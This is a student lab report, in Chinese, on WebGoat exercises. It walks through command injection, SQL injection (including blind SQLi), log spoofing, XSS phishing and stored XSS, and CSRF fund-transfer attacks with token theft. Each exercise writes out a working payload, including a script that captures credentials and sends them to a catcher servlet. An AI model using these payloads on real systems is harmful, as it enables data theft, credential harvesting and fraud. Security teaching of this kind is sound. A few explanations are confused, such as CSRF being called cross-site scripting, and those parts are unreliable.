2017-2018-2 20155315《網絡對抗技術》Exp9 ：Web安全基礎

實驗目的

理解經常使用網絡攻擊技術的基本原理。

• 教程1
• 教程2
• 教程3

實驗內容

• SQL注入攻擊
• XSS攻擊
• CSRF攻擊

Webgoat前期準備

• 從GitHub上下載jar包
• 拷貝到本地，並使用命令java -jar webgoat-container-7.0.1-war-exec.jar運行Webgoat，出現INFO: Starting ProtocolHandler ["http-bio-8080"]則開啓成功，能夠看到佔用8080端口，實驗過程當中不能關閉終端
• 打開瀏覽器輸入127.0.0.1:8080/WebGoat，使用默認名和密碼登陸
• 在Webgoat中，solution是答案，hints是提示。打開界面，能夠看到有一連串的課程。
• 每完成一項課程就會有一個小對勾

（一）SQL注入攻擊

選擇Injection Flaws開始實踐

命令注入：Command Injection

命令注入攻擊是對任何參數驅動的站點的嚴重威脅。

• 查看hints：使用系統命令獲取文件的內容
• 也就是說這個操做是要向操做系統注入命令
• 以ps -ef爲例，獲取進程信息
• 咱們在頁面的源代碼中加入咱們的命令：在源代碼中找到"Backdoors.help"，在其後加上"& ps -ef
• 保存後下拉框中能夠看到咱們剛剛修改的選項，點擊view，能夠看到進程信息

數字型注入：Numeric SQL Injection

• 能看到給出的界面中顯示了一條SQL語句SELECT * FROM weather_data WHERE station = ?，使用數字型SQL注入，能夠在網頁源代碼中的選項後面加上or 1=1，這樣就能夠得到全部地區的天氣信息了。
• 還可用purpsutie抓包修改參數。
• 打開purpsuite，點擊Proxy->Options->Add添加一個監聽端口，添加成功後運行
• 點擊瀏覽器中的preferences->Advanced->Network->Connection->settings->Manual proxy configuration:設置成剛剛綁定的端口號。
• 接着在以前的課程頁面上點擊GO，在purpsuite->Proxy->Intercept能夠看到捕獲的包
• 右鍵選擇send to repeater，點擊Repeater->Params可看到station的值爲101，修改成「101 or 1=1」，點擊GO，再點擊Intercept is on，這時可看到顯示全部地區天氣信息

日誌欺騙：Log Spoofing

• 顧名思義，就是添加假的日誌信息來迷惑操做系統，目的是讓用戶名「admin」成功登陸。
• 在User Name輸入zyl%0d%0aLogin Succeeded for username: admin，%0d是空格，%0a是換行
• 點擊登陸出現兩行，一行提示zyl登陸失敗，另外一行提示admin登陸成功，這些信息就會被保存到日誌裏了。

字符串注入：String SQL Injection

下面的表格容許用戶查看他們的信用卡號碼。嘗試注入一個SQL字符串，致使顯示全部信用卡號。嘗試用戶名「史密斯」。

• 和數字型同樣，咱們的目的是構建一個永真式，因爲字符串在數據庫中是由'構成的，咱們在last name中輸入Smith' OR '1'='1全部的用戶信息被輸出

實驗室stage1：String SQL Injection

• 目的是在不知道密碼的狀況下登陸帳戶Neville
• 在密碼框中輸入' or 1=1 --
• 登陸失敗，查看網頁源代碼，發現對密碼框有長度限制。將長度改成20再試一次，成功了。

實驗室stage3：Numeric SQL Injection

• 目的是用員工的帳戶登陸，瀏覽boss的帳戶
• 首先用Larry的帳號登陸，使用' or 1=1 --做爲密碼
• 點擊ViewProfile能夠查看用戶信息，那麼咱們要作的，就是點擊這個按鈕後跳轉到boss的信息。
• 查看網頁源代碼，能夠看到索引的依據是員工ID，但是咱們不知道老闆的ID怎麼辦？數據庫中可使用排序來篩選信息，而老闆通常工資都是最高的，將id的value改爲101 or 1=1 order by salary desc --

數據庫後門：Database Backdoors

• 根據提示，輸入id爲101
• 咱們能夠看到插入查詢語句的字符串沒有通過任何處理，能夠輸入多條語句進行增、刪、改、查

數字型盲注入：Blind Numeric SQL Injection

• 目的是知道pin在pins 表裏的值，先嚐試101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 100 );看pin的值是否大於100，顯示數是合法的；再用500、1000、5000嘗試，發現pin應該是小於5000的
• 不斷用二分法進行測試，發現pin爲2364

字符串盲注入：Blind String SQL Injection

• 目的依舊是要知道pin的值
• 輸入101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number=’4321432143214321′), 1, 1) < ‘H’ );出錯，把1換成2101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number=’4321432143214321′), 2, 1) < ‘H’ );，不斷嘗試，結果爲Jill

（二）XSS攻擊

選擇Cross-Site Scripting (XSS)開始實踐

網絡釣魚XSS：Phishing with XSS

使用XSS和HTML插入，您的目標是：
將html插入該請求憑據，添加javascript以實際收集憑據，將憑據發送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes…，要經過本課程，憑證必須發佈到捕獲者servlet。

• 根據要求，咱們編寫代碼，設計一個簡單的登陸界面獲取用戶名和密碼併發送到指定地方
  <script> function log(){ alert("Had this been a real attack... Your credentials were juststolen. User Name = " + document.forms[1].user.value + "Password =" + document.forms[1].pass.value); XSSImage=new Image(); XSSImage.src="catcher?PROPERTY=yes&user="+document.forms[1].user.value+ "&password=" + document.forms[1].pass.value + ""; } </script> <form><br><br> <HR> <H3>This featurerequires account login:</H3 > <br> <br>EnterUsername:<br> <input type="text" id="user"name="user"> <br>Enter Password:<br> <inputtype="password" name = "pass"><br> <inputtype="button" name="login" value="login" onclick="log()"> </form> <br><br><HR>
• 點擊搜索，看到下面有個登陸界面，登陸提示

存儲型XSS攻擊：Stored XSS Attacks

• 這種攻擊常見於論壇等留言平臺，用戶留言的時候輸入一段JavaScript腳本，這段腳本就會被保存在數據庫中。由於是留言，因此任何用戶在打開網頁的時候，這個腳本就會被從數據庫中取出來而運行
• 根據題目要求，在留言板中輸入<script>alert("You've been attacked!!!");</script>
• 其餘用戶登陸界面的時候點擊剛剛提交的留言，彈框提示

反射型XSS攻擊：Reflected XSS Attacks

發出請求時，XSS代碼出如今URL中，做爲輸入提交到服務器端，服務器端解析後響應，XSS隨響應內容一塊兒返回給瀏覽器，最後瀏覽器解析執行XSS代碼

• 就像上一個實驗直接在輸入框中輸入代碼同樣，反射型XSS是不持久的，在提交到後臺的過程當中輸入的JavaScript腳本就會被執行
• 一樣輸入彈窗代碼<script>alert("You've been attacked!!!");</script>，點擊purse的同時頁面就給出了反饋

（三）CSRF攻擊

跨站腳本攻擊：Cross Site Request Forgery

您的目標是向新聞組發送電子郵件。 該電子郵件包含一個圖像，其URL指向惡意請求。 在本課中，URL應該指向「攻擊」servlet，其中包含課程的「屏幕」和「菜單」參數，以及具備任意數值的額外參數「transferFunds」（如5000）。您能夠經過查找「屏幕」來構建連接 「和」菜單「值在右側的參數插入。 當時經過身份認證的CSRF電子郵件的接收者將轉移資金。

• 也就是說，要發送一個有惡意圖片的電子郵件，目的是要轉走用戶的錢。
• 在消息框中輸入<img src="attack?Screen=277&menu=900&transferFunds=5000"/>，成功看到左邊多了一個小綠√
• 能夠在當前頁面的下邊的Parameters中查看creen和menu的值

XSS提高：CSRF Prompt By-Pass

• 和上一個實驗差很少，多了一個確認轉帳的任務
• 輸入代碼
  <img src="attack?Screen=279&menu=900&transferFunds=5000"> <img src="attack?Screen=279&menu=900&transferFunds=confirm" >
• 點擊提交、查看留言、轉帳並確認

CSRF令牌攻擊：CSRF Token By-Pass

相似於CSRF課程，您的目標是向包含惡意請求轉移資金的新聞組發送電子郵件。 要成功完成，您須要獲取有效的請求令牌。 提供轉帳資金錶單的頁面包含一個有效的請求令牌。 轉移資金頁面的URL是本課程的「屏幕」和「菜單」查詢參數以及額外的參數「transferFunds = main」的「攻擊」servlet。 加載此頁面，讀取令牌，並在僞造的請求中附加令牌以傳輸數據。 當您認爲攻擊成功時，刷新頁面，您將在左側菜單中找到綠色檢查。

• 在前面實驗的基礎上，使用令牌傳輸數據
• 輸入代碼
  <script> var readToken = function(){ var doc = document.getElementById("frame1").contentDocument var token = doc.getElementsByName("CSRFToken")[0].getAttribute("value"); alert(token); var frame2 = document.getElementById("frame2"); frame2.src = "attack?Screen=277&menu=900&transferFunds=4000&CSRFToken="+token; } </script> <iframe id="frame2" ></iframe> <iframe id="frame1" onload="readToken()" src="attack?Screen=277&menu=900&transferFunds=main" ></iframe>
• 按以前的步驟操做

實驗問題回答

• SQL注入攻擊原理，如何防護
  • 程序對用戶輸入數據的合法性沒有判斷就直接插入查詢語句，攻擊者就能夠添加額外的SQL語句或使用註釋字符獲得額外的信息
    • 對輸入的字符串進行處理，篩除特殊字符
    • 普通用戶與系統管理員用戶的權限要有嚴格的區分
• XSS攻擊的原理，如何防護
  • 用戶在輸入框輸入JavaScript代碼，提交的時候直接執行，有辦法得到網站的cookie
    • 表單提交的時候進行特殊字符的檢測
    • 對輸入框作長度限制
    • 在後臺對數據進行過濾
• CSRF攻擊原理，如何防護
  • CSRF是跨站腳本攻擊，就是在用戶的瀏覽器中執行攻擊者的腳本，來得到其cookie等信息。通常存在XSS漏洞的網站，也極有可能存在CSRF漏洞。
    • 使用token:每個網頁包含一個web server產生的token, 提交時，也將該token提交到服務器，服務器進行判斷，若是token不對，就斷定位CSRF攻擊。
    • 將提交方法改成post
    • 按期清理cookie
    • 使用隨機數對錶單中的值進行驗證

實驗總結

這是最後一個實驗了，作完特別有成就感。每次實驗作完以後都一直想要更深刻地實踐一下，可是又特別怕本身技藝不精搞壞了，此次實驗提供了一個可讓咱們隨時練習的平臺，也經過實例讓咱們在平時生活中能更注意一下容易被攻擊的細節。

參考資料

• webgoat實戰指南